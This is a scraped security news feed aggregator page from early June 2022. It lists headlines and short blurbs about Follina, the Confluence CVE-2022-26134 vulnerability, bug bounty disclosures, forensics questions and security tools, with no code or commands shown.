    作者:Y4er 原文链接:https://y4er.com/post/follina-microsoft-office-rce-with-ms-msdt-protocol/ 前言 看推特发了一个好玩的office rce。最早应该是起源于nao_sec的推特 然后又发现了一篇分析文章。 https://doublepulsar.com/follina-a-microsoft-office-c...
  • Open

    CVE-2022-26134 Confluence OGNL RCE 漏洞深入分析和高版本绕过沙箱实现命令回显
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/nCMtSD7QH8ai6fpurJBXTg 漏洞信息 最近 Confluence 官方通报了一个严重漏洞 CVE-2022-26134 : 从漏洞描述来看,这仍然是一个 OGNL 表达式注入漏洞。影响版本如下: from 1.3.0 before 7.4.17 from 7.13.0 before 7.13...
    Follina Microsoft Office RCE with MS-MSDT Protoco
    作者:Y4er 原文链接:https://y4er.com/post/follina-microsoft-office-rce-with-ms-msdt-protocol/ 前言 看推特发了一个好玩的office rce。最早应该是起源于nao_sec的推特 然后又发现了一篇分析文章。 https://doublepulsar.com/follina-a-microsoft-office-c...
  • Open

    一文了解威胁建模
    威胁建模的含义、工作原理、主流威胁建模框架、工具以及最佳实践。
    8大预测分析工具比较
    这些工具包括用于从整个企业收集数据的复杂管道,添加统计分析和机器学习层以对未来进行预测,并将这些见解提炼成有用的摘要,以便业务用户可以对此采取行动。
    盘点:9款身份和访问管理工具
    确保安全访问和身份管理是网络安全态势的两大基础。
    FreeBuf早报 | Confluence 零日漏洞修复程序已发布;陕西一公司直播员工上班过程
    Atlassian解决了 Confluence 服务器和数据中心产品中一个被积极利用的关键远程代码执行漏洞 (CVE-2022-26134)。
    加密货币骗局在美或已造成超10亿美元损失
    2021年1月至2022年3月期间,超46,000名美国人报告受到加密货币诈骗,造成的损失不低于10亿美元。
    2021年,苹果阻止了160万个欺诈用户的应用程序
    苹果 App Store 应用审核团队封杀了超过 34.3 万个违反隐私规定的 iOS应用程序。
    新的Windows搜索零日漏洞可被远程托管恶意软件利用
    攻击者可以通过启动Word文档来加以利用。
    《CCSIP 2022中国网络安全产业全景图》调研启动 | FreeBuf咨询
    因为宏观,所以全面 ,CCSIP2022全景图正式启动。
    紫光展锐曝高危漏洞,可阻止手机联网
    紫光展锐表示将会立即对该漏洞进行修复;谷歌也表示将会在下一个Android安全补丁中修复该漏洞。
    GitLab 通过安全更新修复了帐户接管高危漏洞
    GitLab 为其社区版和企业版产品的多个版本发布了关键安全更新,以解决8个漏洞问题,其中一个为账户接管的高危漏洞。
    亿格云:用SASE解决企业数字化面临的三大挑战 | 网安新势力SOLO发布季
    远程办公变成常态的当下,如何实现企业安全统一管理,网安新势力SOLO发布季告诉你!

  • Open

    How does Docker run Containers Under the Hood
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Heap overflow via HTTP/2 PUSH_PROMISE
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1589847
    KRB-FTP: Security level downgrade
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1590102
  • Open

    Cloudflare observations of Confluence zero day (CVE-2022-26134)
    Article URL: https://blog.cloudflare.com/cloudflare-observations-of-confluence-zero-day-cve-2022-26134/ Comments URL: https://news.ycombinator.com/item?id=31634770 Points: 6 # Comments: 0
    Unauthenticated Remote Code Execution in Atlassian Confluence (CVE-2022-26134)
    Article URL: https://bugalert.org/content/notices/2022-06-02-confluence.html?src=tw Comments URL: https://news.ycombinator.com/item?id=31626703 Points: 1 # Comments: 0
  • Open

    How Attacker could have suffocated the company staff
    Background: Continue reading on Medium »
    If It’s a Feature!!! Let’s Abuse It for $750
    Hello mates, Continue reading on Medium »
    Log Poisoning to Remote Code Execution | LFI | cUrl|
    In this article, we will see how to perform Remote Code Execution through Log Poisoning which is a type of Local File Inclusion. Continue reading on System Weakness »
  • Open

    “It’s Full of Secrets and User-Generated Classified Cyber Attack Information” — An Inside Peek
    A modern whiz-kid child story of the son of an ex-Communist era famous family from Bulgaria up to present day deep from the trenches. Continue reading on Medium »
    Hong Kong police tightening control over citizens on June 4th
    As they did last year, the Hong Kong administration tightened security and warned its residents not to gather to commemorate China’s… Continue reading on Medium »
    Good News Roundup: the OSINT-inspired Geek Edition
    In this week’s OSINT-inspired geek edition of the good news roundup, Russia’s tech industry reels under sanctions, and much more. Continue reading on Medium »
    Why the war? A quantitative answer
    Can looking at Russian and Ukrainian news wires shed light on the question? Continue reading on Medium »
    SPY NEWS: 2022 — Week 22
    Summary of the espionage-related news stories for the Week 22 (29 May-4 June) of 2022. Continue reading on Medium »
  • Open

    Old Blackberry (8300)
    I need to create a forensics copy from an old Blackberry 8300. Any suggestion? Thanks submitted by /u/Zipper_Ita [link] [comments]
    Let's solve challenges - Cellebrite 2022 CTF Writeup
    Despite having had little time, I took part in the lovely #CellebriteCTF last week! Please enjoy my writeup: https://www.dfirblog.com/cellebrite-2022-ctf-writeup/ Feel free to provide any feedback you desire! submitted by /u/samaritan_o [link] [comments]
    Decrypting a password locked .RAR file
    Hey there, I have a .RAR file that contains a backup of a Samsung phone. This file is created using Smart Switch - a Samsung software that creates a backup of the entire phone. The file is about 9GB. My client set a password for the backup, but now they forgot their password. They however, have several decrypted files when they extracted the RAR file a few years back – when they still knew the password. These decrypted files range from jpegs to mp4 and to pdfs. The directories in the RAR file can still be accessed with WinRAR. I can open the folders and see the contents of it including their metadata (i.e. date modified, file type, file size). But when I try to extract or open them, I am prompted to type a password. I know this seems like a long shot, but is there any chance the entire RAR file can be decrypted using some of the decrypted files? submitted by /u/wrappedbubble [link] [comments]
  • Open

    Nidhogg rootkit - An all in one rootkit for all windows 10 versions and windows 11 that can be managed with single hpp file
    submitted by /u/Idov31 [link] [comments]
    Analysis of a large brute force attack campaign against Windows Remote Desktop
    submitted by /u/jwizq [link] [comments]
    Conti RaaS group chat leaked (English translation) about firmware exploit and implant
    submitted by /u/hardenedvault [link] [comments]
    Code for Beating Google ReCaptcha and the funCaptcha using AWS Rekognition
    submitted by /u/ScottContini [link] [comments]
  • Open

    i want to dive into exploit _dev ; do i need to learn Assembly language
    submitted by /u/Doom_Guy777 [link] [comments]
  • Open

    SecWiki News 2022-06-05 Review
    在计算机领域的科研中,最初的创新点从何而来? by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-05 Review
    在计算机领域的科研中,最初的创新点从何而来? by ourren 更多最新文章,请访问SecWiki
  • Open

    Xepor:一款针对逆向工程和安全分析的Web路由框架
    Xepor是一款专为逆向分析工程师和安全研究专家设计的Web路由框架,该工具可以为研究人员提供类似Flask API的功能。
    Tornado:一款功能强大的红队匿名反向Shell
    Tornado是一款功能强大的红蓝队安全研究工具,同时也一款功能强大的匿名反向Shell。
    Java反序列化基础篇-类加载器
    这篇文章/笔记的话,打算从类加载器,双亲委派到代码块的加载顺序这样来讲。最后才是加载字节码。
    EvilBox-One靶机渗透
    EvilBox: One靶机是简单级别靶机,用于 VirtualBox。
  • Open

    Tails 5.1 arrives with a fix for a serious JavaScript security vulnerability
    Article URL: https://www.neowin.net/news/tails-51-arrives-with-a-fix-for-a-serious-javascript-security-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31630555 Points: 1 # Comments: 0
  • Open

    Creating a backdoor in PAM in 5 line of code
    No content preview
    Owasp crAPI: Introducing API Security The Hacker Way
    No content preview
    Testing EDRs for Linux — Things I wish I knew before getting started
    No content preview
  • Open

    Creating a backdoor in PAM in 5 line of code
    No content preview
    Owasp crAPI: Introducing API Security The Hacker Way
    No content preview
    Testing EDRs for Linux — Things I wish I knew before getting started
    No content preview
  • Open

    Creating a backdoor in PAM in 5 line of code
    No content preview
    Owasp crAPI: Introducing API Security The Hacker Way
    No content preview
    Testing EDRs for Linux — Things I wish I knew before getting started
    No content preview
  • Open

    Hunting suspicious LDAP queries in tons of logs
    Enumeration and Reconnaissance in AD Environment Continue reading on Medium »

  • Open

    I Have Find Serval Bugs In Circle.so & They Don’t Paid
    Hi Folks, Continue reading on Medium »
    Iagon Token Bridge UI Bug Bounty
    You better watch out, it’s bug hunting season! Continue reading on Iagon Official »
    Networking Protocols Explained | CyberSecurity
    Networking Protocols: FTP, SSH, Telnet, SMTP, DNS, HTTP, HTTPS, POP3, IMAP, RDP, TCP, UDP, ARP, RARP, DHCP, MTP, SFTP, SSL, TLS, NTP, PPP… Continue reading on Medium »
    DNS in easy way
    dns is phonbook of internet where domain names are translated to ip address.computer Continue reading on Medium »
  • Open

    What are some free non-zero policy encryption sites that protect data?
    I currently use Tresorit, and I store a single DB file of my customers on their site. However, I recently lost access and couldn't recover that file, but I did have a backup elsewhere. Instead of recovering the account, I was forced to reset my account because of said zero knowledge policy. submitted by /u/inert- [link] [comments]
    SynAck Red Team
    Hi, I saw many people mentioning they're part of SynAck Red Team. Is that a job ? are they getting paid ? submitted by /u/Spare_Prize1148 [link] [comments]
    How Likely is a Malicious MITM Attack on the Cellular Network?
    Hi everyone, For background: I have been playing around with a SIM7000e 4g module that connects to the CAT-M1 cellular network here in Australia. I purchased it in order to send GPS coordinates to dweet . io. Essentially I want to make a GPS tracker for my motorcycle. The thing is: I can send data via HTTP but not HTTPS. I have been trying for so many hours to send data via HTTPS with no luck. Some AT commands you're supposed to input, the module doesnt seem to even recognize. But thats not why I am here. I wanted to ask how likely is it that a hacker could use something like a stingray to grab my GPS coordinates if I sent them via HTTP? Does this type of attack happen often? (No personal details or other info would be sent with the coordinates) I have heard that devices like stingrays are extremely hard to get and very expensive. Furthermore, a hacker would not immediately no what the numbers mean, and even if they did, would not know what is currently situated at those coordinates. I am assuming that I am just being paranoid? Thanks submitted by /u/F0restFiend [link] [comments]
    Please help me with an internet stalker
    My best friend has been recently bombarded with dms on Instagram. They come from accounts that either have her name, birth date, or something along the lines. The messages are very graphic and threatening, telling her that if she attends a party or something they will sexually assault her or in some cases, end with her life. One of these accounts has also sent her a photo of her own house with similar caption. They messaged her mom, her friends, basically everyone in her social circle. The case has already been presented to the police but there's been no advances and each day she grows concerned. Is there any way to track a location, an email, a name, just... anything, if I provide a link to one of the profiles? I already tried out online tools and none have proven to be successful. If this weren't of such urgency I would not be asking, but we are running out of options. Each day is more terrifying for her, and painful for us, her friends. Thank you in advance. submitted by /u/smly7 [link] [comments]
  • Open

    Github Account Takeover from Docs page of `kubernetes-csi.github.io`
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1434967 - Bounty: $100
  • Open

    My website/domain investigation toolkit
    Domain and hosting data Reverse lookup Traffic and CMS analysis AD and DNS analysis  Backup and other services Continue reading on Medium »
    Ethereum OSINT
    I watched an interesting speech by Jeff Lomas, Detective and Criminologist with the Las Vegas Police Department on the investigation of… Continue reading on Medium »
    A Guide To Twitter advanced search operators: twitter hacking
    Social media intelligence (SMI or SOCMINT) Continue reading on Medium »
  • Open

    SecWiki News 2022-06-04 Review
    端口扫描技术实现分析 by ourren Awesome-Redteam: 一个红队知识仓库 by ourren ATT&CK矩阵的攻与防 by ourren bandit工具分析 by ourren 基于框架漏洞的代码审计实战 by ourren MITRE ATT&CK实践入门 by ourren Tomcat CVE-2022-29885 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-04 Review
    端口扫描技术实现分析 by ourren Awesome-Redteam: 一个红队知识仓库 by ourren ATT&CK矩阵的攻与防 by ourren bandit工具分析 by ourren 基于框架漏洞的代码审计实战 by ourren MITRE ATT&CK实践入门 by ourren Tomcat CVE-2022-29885 by ourren 更多最新文章,请访问SecWiki
  • Open

    Certificate Ripper released - tool to extract server certificates
    submitted by /u/Hakky54 [link] [comments]
    Technical Advisory – Multiple Vulnerabilities in U-Boot (CVE-2022-30790, CVE-2022-30552) - including remote write anywhere primitive in its IP stack
    submitted by /u/digicat [link] [comments]
  • Open

    萌新如何玩转mimikatz
    mimikatz就是我遇见的一个坎,我希望记录下这个过程,尽可能的帮助大家更快的掌握mimikatz的用法和技巧。
    萌新如何玩转mimikatz
    mimikatz就是我遇见的一个坎,我希望记录下这个过程,尽可能的帮助大家更快的掌握mimikatz的用法和技巧。
  • Open

    Is there a way (maybe an extention) to show thumnails for image lists like these? It would be nice to see what each item is before clicking it.
    submitted by /u/PmMeUrEncouragements [link] [comments]
  • Open

    Linux Hardening techniques
    Introduction Continue reading on InfoSec Write-ups »
    #Part 1 : The reality of modern information security in enterprise around the world.
    No content preview
  • Open

    Linux Hardening techniques
    Introduction Continue reading on InfoSec Write-ups »
    #Part 1 : The reality of modern information security in enterprise around the world.
    No content preview
  • Open

    Linux Hardening techniques
    Introduction Continue reading on InfoSec Write-ups »
    #Part 1 : The reality of modern information security in enterprise around the world.
    No content preview
  • Open

    PCIe DMA Attack against a secured Jetson Nano (CVE-2022-21819)
    Article URL: https://www.thegoodpenguin.co.uk/blog/pcie-dma-attack-against-a-secured-jetson-nano-cve-2022-21819/ Comments URL: https://news.ycombinator.com/item?id=31617467 Points: 23 # Comments: 0
  • Open

    UFED alternative for Samsung
    How can I do a Samsung smartphone Forensics Copy, without UFED? There is any free/open source software or solution? submitted by /u/Zipper_Ita [link] [comments]
  • Open

    Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022-26134)
    CVE-2022-26134 is a critical severity unauthenticated remote code execution vulnerability in Atlassian Confluence Server and Data Center. We share statistics on potentially vulnerable servers and provide suggestions for mitigation. The post Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022-26134) appeared first on Unit42.
  • Open

    K8s 的核心是 API 而非容器:从理论到 CRD 实践(2022)
    本文串联了以下几篇文章的核心部分, Kubernetes isn’t about containers,2021 Kubernetes is a Database, 2019 CRD is just a table in Kubernetes, 2020 论述了 K8s 的核心价值是其通用、跨厂商和平台、可灵活扩展的声明式 API 框架, 而不是容器(虽然容器是它成功的基础);然后手动创建一个 API extension(CRD), 通过测试和类比来对这一论述有一个更直观的理解。 例子及测试基于 K8s v1.21.0,感谢原作者们的精彩文章。 1 K8s 的核心是其 API 框架而非容器 1.1 容器是基础 1.2 API 才是核心 1.2.1 K8s 之前:各自造轮子,封装厂商 API 差异 1.2.2 K8s 面世:标准化、跨厂商的 API、结构和语义 1.2.3 K8s API 扩展:CRD 1.3 小结 2 K8s 的 API 类型 2.1 标准 API(针对内置资源类型) 2.1.1 Namespaced 类型 2.1.2 Un-namespaced 类型 2.2 扩展 API(apiextension) 2.2.1 Namespaced 类型 2.2.2 Un-namespaced 类型 2.3 CRD 3 直观类比:K8s 是个数据库,CRD 是一张表,API 是 SQL 3.1 K8s 是个数据库 3.2 CRD 是一张表 3.2.1 定义表结构(CRD spec) 3.2.2 测试:CR 增删查改 vs. 数据库 SQL 3.3 API 是 SQL 4 其他 4.1 给 CR 打标签(label),根据 label 过滤 4.2 K8s API 与鉴权控制(R…

  • Open

    Popping Eagle: How Global Analytics Uncovered a Stealthy Threat Actor
    submitted by /u/RamblinWreckGT [link] [comments]
    Technical Analysis of Confluence CVE-2022-26134
    submitted by /u/chicksdigthelongrun [link] [comments]
    Detecting and mitigating CVE-2022-26134: Zero day at Atlassian Confluence
    submitted by /u/MiguelHzBz [link] [comments]
    Meeting Owl Pwnage
    submitted by /u/RudyWaltz [link] [comments]
    Released new version SCodeScanner. Added yaml scanning ability for scanning kubernetes configuration files. Github - https://github.com/agrawalsmart7/scodescanner
    submitted by /u/agrawal7 [link] [comments]
    WinRS and Exchange, a sneaky backdoor
    submitted by /u/picobello_bv [link] [comments]
    CVE-2022-30190 : Microsoft Windows Support Diagnostic Tool RCE
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Swedish newspaper archive. 1884-2022.
    https://paperarchive-prod.svd.se/ submitted by /u/Pelicaros [link] [comments]
    Tons of scans of old books. Some older then the year 1600.
    http://scans.cartago.nl/ I have no idea what these books are about. Thought some of y'all might enjoy. I Copied this from the main site: ​ Are you a new visitor or do you want to know more about this site? This section gives you background information about Cartago. Also take a look at the Frequently Asked Questions for more information. What is Cartago? Cartago is the computer system of the Digital Charter Book Groningen and Drenthe. Nearly 35,000 deeds and other documents from before 1600 are included. This makes the sources for medieval culture and history accessible to a wide audience. Cartago is an initiative of the Stichting Digitaal Oorkondeboek Groningen and Drenthe. This foundation consists of representatives of the University of Groningen, the Groninger Archives, the Drents Archive and the former Drents Plateau. Learn more about the organization . Charters as source The charters are the main sources for Groningen and Drenthe up to 1600. This is special because elsewhere in the Netherlands usually city accounts, protocols and other registers are also available. Anyone who wants to research the Groningen and Drenthe history and culture before 1600 will therefore have to deal with the charters. Whether it concerns research into a village, a farm or a family. A charter is a document that serves as proof of a legal act. More information… Who is Cartago intended for? Cartago is suitable for anyone who is researching: ​ genealogy and heraldry local and regional history linguistics onomastics church history socio-economic history legal history In addition, Cartago focuses on education, including the charter game. Search in Cartago Via the Search section, visitors can quickly search the database. In addition to the images of the charters, any available transcripts also appear on the screen. A scranscript is a translation of the medieval text. Inventories ( www.archieven.nl ) can also be used to search for deeds. submitted by /u/Pelicaros [link] [comments]
    pictures from a hospital in Africa, marked NSFW because of a few images of skin infections of some kind
    submitted by /u/subwaytech [link] [comments]
  • Open

    LoveTok — HackTheBox — Web Exploitation — Challenge — Writeup
    Hello guys I am back to posting another writeup. So usually I don’t post writeups about HackTheBox challenges. But this was one of the… Continue reading on Medium »
    Burp Suite: Do I need the professional edition?
    No but it helps Continue reading on Medium »
    My first bug bounty in Business Logic
    Hey Hello, Hackers, Continue reading on Medium »
    Bug Bounty — Continue Penetration Testing
    Continue reading on Medium »
    2FA Bypass due to unauthorized 2FA disabling via X/CSRF
    Product Info Continue reading on Medium »
  • Open

    Understanding REvil: REvil Threat Actors May Have Returned (Updated)
    Ransomware cases worked by Unit 42 consultants in the first six months of 2021 reveal insights into the preferred tactics of REvil threat actors. The post Understanding REvil: REvil Threat Actors May Have Returned (Updated) appeared first on Unit42.
  • Open

    Solving Step 2 of Downtown Murderer without using reverse image search — Hacktoria
    Hacktoria’s monthly CTF in May was Downtown Murderer. There were 6 steps and I will focus in Step 2, which consists in geolocate three… Continue reading on Medium »
    War in Ukraine / June 2
    The first 100 days of the war in Ukraine Continue reading on Medium »
    The OSINT Exposure of Offshore Oil Platforms
    Offshore oil platforms, also known as oil rigs, are large industrial control systems meant to pull and process oil and natural gas from… Continue reading on Medium »
    The reverse image tools I use
    The reverse image tools I use Continue reading on Medium »
  • Open

    8ybhy85kld9zp9xf84x6.imgur.com Subdomain Takeover
    Imgur disclosed a bug submitted by mr_baka: https://hackerone.com/reports/1527405 - Bounty: $50
  • Open

    Apple Silicon “Augury” DMP Vulnerability
    Article URL: https://mjtsai.com/blog/2022/06/03/apple-silicon-augury-dmp-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31610726 Points: 2 # Comments: 0
    U.S. Technology, a Longtime Tool for Russia, Becomes a Vulnerability
    Article URL: https://www.nytimes.com/2022/06/02/business/economy/russia-weapons-american-technology.html Comments URL: https://news.ycombinator.com/item?id=31609058 Points: 3 # Comments: 0
  • Open

    What areas in DFIR are lacking research?
    What are some areas in DFIR that are lacking industry research? What would you want to see more of? submitted by /u/haloman882 [link] [comments]
    Evidence Mover / Robocopy / Teracopy ?
    Hi all! I have searched already for these keywords and I could not locate any previous questions related to this. What are you using for copying evidence from A to B? I have tried the tools mentioned in the title, but I was wondering if there is something different/better. Maybe even command-line? Workstations at work are Windows so I'm looking for options for Windows. submitted by /u/agente_99 [link] [comments]
  • Open

    SecWiki News 2022-06-03 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-03 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Vulnerability Management Runbook
    Hello guys/gals of this community. anyone experience with creating Vulnerability Management Runbooks? Or any resources that i can lean to? submitted by /u/hannibal_the_general [link] [comments]
    Starting with car hacking
    A little backstory first, after 15 years in various software development roles (using mostly C and C++), I have lost all motivation about the field Recently, I came across the research of Charlie Miller and Chris Valasek, and it sparked my interest for tech again. So the question is, what and from where do I start learning networking to be able to break into the car pentesting industry? I know very basic stuff, like subnetting, but not much more. Most tutorials on the internet do not go beyond just being able to answer the CCNA test's questions submitted by /u/Idonotlikeworking [link] [comments]
    I need help
    So someone I know has her sns accounts being hacked, she gets notified via email if her fb is being tapped into. The email shows the device name. I'm asking is if it's possible to trace the device name or at least the ip address, using the device name submitted by /u/IncidentMinimum [link] [comments]
  • Open

    Java反序列化基础篇-JDK动态代理
    Java反序列化基础篇-JDK动态代理,一文带你梳理清到底什么是 jdk 动态代理。为之后的 cc 链分析打好基础。
    以迷宫类比PHP反序列化链
    以走迷宫,类比PHP反序列化链; 给出一个了解php反序列化漏洞基本原理后,分析PHP框架反序列化漏洞的思路。
  • Open

    Kubernetes 101 | Setting up Kubernetes Cluster Locally
    This blog is about setting the local Kubernetes cluster for learning & testing using multiple tools like Kind, Minikube, Kubeadm & K3s. Continue reading on InfoSec Write-ups »
    Enumeration and lateral movement in GCP environments
    No content preview
    Android Pentesting Methodology (Pt. 1)
    No content preview
  • Open

    Kubernetes 101 | Setting up Kubernetes Cluster Locally
    This blog is about setting the local Kubernetes cluster for learning & testing using multiple tools like Kind, Minikube, Kubeadm & K3s. Continue reading on InfoSec Write-ups »
    Enumeration and lateral movement in GCP environments
    No content preview
    Android Pentesting Methodology (Pt. 1)
    No content preview
  • Open

    Kubernetes 101 | Setting up Kubernetes Cluster Locally
    This blog is about setting the local Kubernetes cluster for learning & testing using multiple tools like Kind, Minikube, Kubeadm & K3s. Continue reading on InfoSec Write-ups »
    Enumeration and lateral movement in GCP environments
    No content preview
    Android Pentesting Methodology (Pt. 1)
    No content preview
  • Open

    Cve-2022-26134: Active Exploitation of Atlassian Confluence
    Article URL: https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ Comments URL: https://news.ycombinator.com/item?id=31604711 Points: 2 # Comments: 0
    CVE-2022-26134: RCE in Atlassian Confluence and Data Center products
    Article URL: https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data Comments URL: https://news.ycombinator.com/item?id=31604258 Points: 3 # Comments: 1
  • Open

    Red Team Server
    Red Team Server (RTS) Continue reading on Medium »
    2FA Bypass due to unauthorized 2FA disabling via X/CSRF
    Product Info Continue reading on Medium »

  • Open

    Daily Cyber Brief
    submitted by /u/RandyMarsh_Lorde [link] [comments]
    Exploiting CVE-2022-26923 by Abusing AD CS
    We are doing 2 THM Labs. In the first one we are abusing vulnerable certificate templates manually with Certify and Rubeus, then changing the domain Administrator's password. In the second lab, we are utilizing Certipy POC to takeover DC machine and dump hashes for all users. Available on YouTube: https://youtu.be/HBRCI5O35R8 Hope you enjoy the video and learn something new. The channel is new and all feedback is appreciated. submitted by /u/lsecqt [link] [comments]
  • Open

    Unauthenticated Remote Code Execution in Atlassian Confluence (CVE-2022-26134)
    submitted by /u/sullivanmatt [link] [comments]
    Mining Google Chrome CVE data
    submitted by /u/onlinereadme [link] [comments]
  • Open

    Confluence – Critical unauthenticated remote code execution vulnerability
    Article URL: https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html Comments URL: https://news.ycombinator.com/item?id=31601794 Points: 10 # Comments: 3
    Illumina Cybersecurity Vulnerability
    Article URL: https://www.fda.gov/medical-devices/letters-health-care-providers/illumina-cybersecurity-vulnerability-may-present-risks-patient-results-and-customer-networks-letter Comments URL: https://news.ycombinator.com/item?id=31600655 Points: 1 # Comments: 0
  • Open

    Popping Eagle: How We Leveraged Global Analytics to Discover a Sophisticated Threat Actor
    We observed a specially crafted DLL hijacking attack used by a previously unknown piece of malware that we dubbed Popping Eagle. The post Popping Eagle: How We Leveraged Global Analytics to Discover a Sophisticated Threat Actor appeared first on Unit42.
  • Open

    Embedding Python Malware
    Writing malware in C is cool. What’s cooler? Writing malware in Python and embedding it in C-based malware. Let’s learn how to do that. Continue reading on Medium »
  • Open

    iphone remotely wiped inside faraday box
    I have an iphone 11 that was remotely wiped while it was inside a faraday cage. The phone was turned on while it was inside the cage, it booted into the "lost phone" screen for less than a second and then it began the wiping process. Any ideas on how something like this could happen? submitted by /u/croforensic [link] [comments]
    Internship/Mentorship opportunities
    Hello all I'm currently pursuing my Bachelor's degree in Computer forensics and digital investigation. I will be graduating next year and wanted to ask if anyone knew some places I can apply to internship or if anyone has mentorship programs. I want to get my foot in the door and start doing some hands-on work and learning the day to day work style. I would really appreciate any help or information on this matter. Thank you all in advance. submitted by /u/Sudden_Ad9859 [link] [comments]
    FTK imager error
    Hi, I did a FTK image of a ssd. I started and everything went well until ftk got to the point where it is verifying the image I get this message “imager encountered 32 error(s). the image is corrupted imager will attempt to retrieve remaining valid data” it still started to do a verification check after and no surprise it did end up not matching. But my question is. What does it mean? Does it have something to do with the cables? The data on the ssd? Or something else? If I understand it correctly I’m only copying the image so corrupted files shouldn’t ebe a problem, right? Also I’m taking an image from a windows computers ssd submitted by /u/Gackie [link] [comments]
    Chain of custody form
    Do you recommend the proposal of changing the traditional hardcopy form chain of custody to digital chain of custody? And why so? submitted by /u/alialibarrett [link] [comments]
    SMS Forensics - Android
    Assuming I have an unlocked android phone. I’d like to test mobile forensics tools, especially with SMS. Any recommendations on tools & techniques to image, parse, extract SMS info from an android device? I want to be able to answer questions like: When was a message sent/received? Has the timestamp been tempered with? Does it recognize different time zones then normalize the timestamps? Thank you. submitted by /u/trafficbridge [link] [comments]
  • Open

    More Misc Stuff
    submitted by /u/ilikemacsalot [link] [comments]
    Misc Stuff
    submitted by /u/ilikemacsalot [link] [comments]
    A few movies & series
    http://51.68.207.131/ Not a lot here, but did see some newer content. submitted by /u/dasheswithdots [link] [comments]
    photos of car parts
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Australian aviation photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Mining Google Chrome CVE Data
    Article URL: https://clearbluejar.github.io/posts/mining-google-chrome-cve-data/ Comments URL: https://news.ycombinator.com/item?id=31599584 Points: 2 # Comments: 0
    Using the Kani Rust Verifier on a Rust Standard Library CVE
    Article URL: https://model-checking.github.io//kani-verifier-blog/2022/06/01/using-the-kani-rust-verifier-on-a-rust-standard-library-cve.html Comments URL: https://news.ycombinator.com/item?id=31594351 Points: 3 # Comments: 0
  • Open

    The Fuzzing Book
    Article URL: https://www.fuzzingbook.org/ Comments URL: https://news.ycombinator.com/item?id=31598335 Points: 39 # Comments: 1
  • Open

    How to scope what harware I need for network monitoring?
    Hi there. I need a consultation. What is the step by step algorithm to understand what hardware specifications (CPU, RAM, Disks) do I need? I tried to setup ELK+Suricata+Zeek on VM server: 16 CPUs, 32 GB RAM, 950GB two discs: OS disk 450 GB 500 GB dedicated to elasticsearch But the amount of processing done by zeek and suricata made it a noisy neighbour for other VMs and killing the hypervisor, so I need to migrate to physhical servers, but I don't know how to calculate hardware specifications. submitted by /u/athanielx [link] [comments]
    How do you review and document Cyber Security implementation?
    How do you review and document Cyber Security implementation in an organization? submitted by /u/techno_it [link] [comments]
    Hardware RasberryPi Ad-blocker hooked up to WiFi, secure?
    Been using normal adblockers since they came about but i do not like all the data they are getting. How secure is a Rasberrypi blocker, hooked up to my wifi? Will it cause problems if i say, use streaming services on my TV for example? Because some adblockers in the past have been iffy when it comes to "real" streaming services with ads. And since this will be hardware i rather not plug it out if i need to watch a TV-channel's streaming app etc. (I mainly want the adblocker for youtube) I want to make as safe of a closed eco-system as i can, and still use technology somewhat normal. Im in the process of securing up everything i got times 2. If anyone got other solid tips that i can do on my own (without losing access to normal things) i am happy to hear it. Of course i always do the usual basic stuff, setting everything i can via GUI to barebone at first installation on every program. Battling cookies like 50times per day the last years etc etc etc. It's all so tiresome. submitted by /u/bukush [link] [comments]
  • Open

    War in Ukraine / June 1
    Because of Russia’s war, European countries are reconsidering their military policies Continue reading on Medium »
    Cyberseguridad en Costa Rica de la mano de un No-Experto
    IT Now IT NOW Hablemos de Cyberseguridad. Continue reading on Medium »
    Clean Your Images— OSINT Challenge 25
    We have a really short one for this round of quizzes. Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective… Continue reading on Medium »
    What Is Open Source Intelligence (OSINT)?
    What Is Open Source Intelligence (OSINT)? Continue reading on Medium »
  • Open

    SecWiki News 2022-06-02 Review
    兰德深度报告-美国商业太空能力与市场概述 by ourren 重新定义SOAR by ourren FirmSec-物联网固件中的第三方组件安全性研究 by ourren CobaltStrike WebServer特征分析 by ourren Fuzzm: 针对WebAssembly内存错误的模糊测试 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-02 Review
    兰德深度报告-美国商业太空能力与市场概述 by ourren 重新定义SOAR by ourren FirmSec-物联网固件中的第三方组件安全性研究 by ourren CobaltStrike WebServer特征分析 by ourren Fuzzm: 针对WebAssembly内存错误的模糊测试 by ourren 更多最新文章,请访问SecWiki
  • Open

    美国BIS发布网络安全禁令,全球漏洞共享机制遭严峻挑战
    BIS此次发布的新规后,微软等国家科技巨头却表露出担忧,全球网络安全漏洞共享机制很有可能遭遇严峻挑战。
    “猎图行动”:针对NFT艺术家的窃密活动分析
    根据攻击手法、C2地址等特征将其关联为同一攻击组织发起的规模化窃密行动,由于攻击者的主要目标为NFT艺术品,安天将该活动命名为“猎图行动”。
    FreeBuf周报 | 360万+MySQL服务器暴露在互联网上;匿名者声称将对白俄罗斯发起入侵
    在计算机行业,“删库跑路”流传已久,早已成为诸多程序员用来发泄工作压力的口头语。
    一个excel邮件攻击样本的简要分析
    本次邮件是利用cve-2017-11882(EQNEDT32.EXE公式编辑器漏洞)进行攻击。
    Telegraph在网络钓鱼中或早已滥用成灾
    近日,有观察人士发现,通讯软件Telegram的匿名博客平台Telegraph可能正被网络钓鱼者积极利用。
    员工“删库跑路”,真能一走了之?
